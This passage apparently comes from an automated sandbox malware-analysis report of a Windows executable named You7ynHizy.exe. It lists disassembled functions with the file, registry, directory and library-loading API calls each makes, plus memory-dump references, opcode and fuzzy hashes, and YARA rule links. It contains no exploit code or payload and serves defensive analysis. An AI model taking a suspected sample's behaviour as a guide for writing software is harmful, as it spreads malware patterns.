                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteValue
                                                                                            • String ID:
                                                                                            • API String ID: 2831762973-0
                                                                                            • Opcode ID: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                                            • Instruction ID: ea1e1dc52e0dd693c7e9773bcfdc4231a80a88f887ae940f22e44fa758f22ebe
                                                                                            • Opcode Fuzzy Hash: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                                            • Instruction Fuzzy Hash: 4CF06232A045119BE704ABA49B8EABE72A4AB44354F29403FFA42F71C1CAF85D41576D
                                                                                            Function 004053D2 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 004053E2
                                                                                              • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 0040542E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2896919175-0
                                                                                            • Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                                            • Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
                                                                                            • Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                                            • Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E
                                                                                            Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            • Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                                            • Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
                                                                                            • Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                                            • Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68
                                                                                            Function 00406671 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                              • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                              • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                                              • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                            • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                                            • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                            • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                                            Function 00405D8D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                            Function 00405D68 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                            • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                                            • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                            • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                                            Function 0040584B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                            • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                            • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                                            Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID:
                                                                                            • API String ID: 390214022-0
                                                                                            • Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                                            • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                            • Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                                            • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                            Function 00406132 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                            • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                            • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                                            Function 00405E10 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                            • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                            • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                                            Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
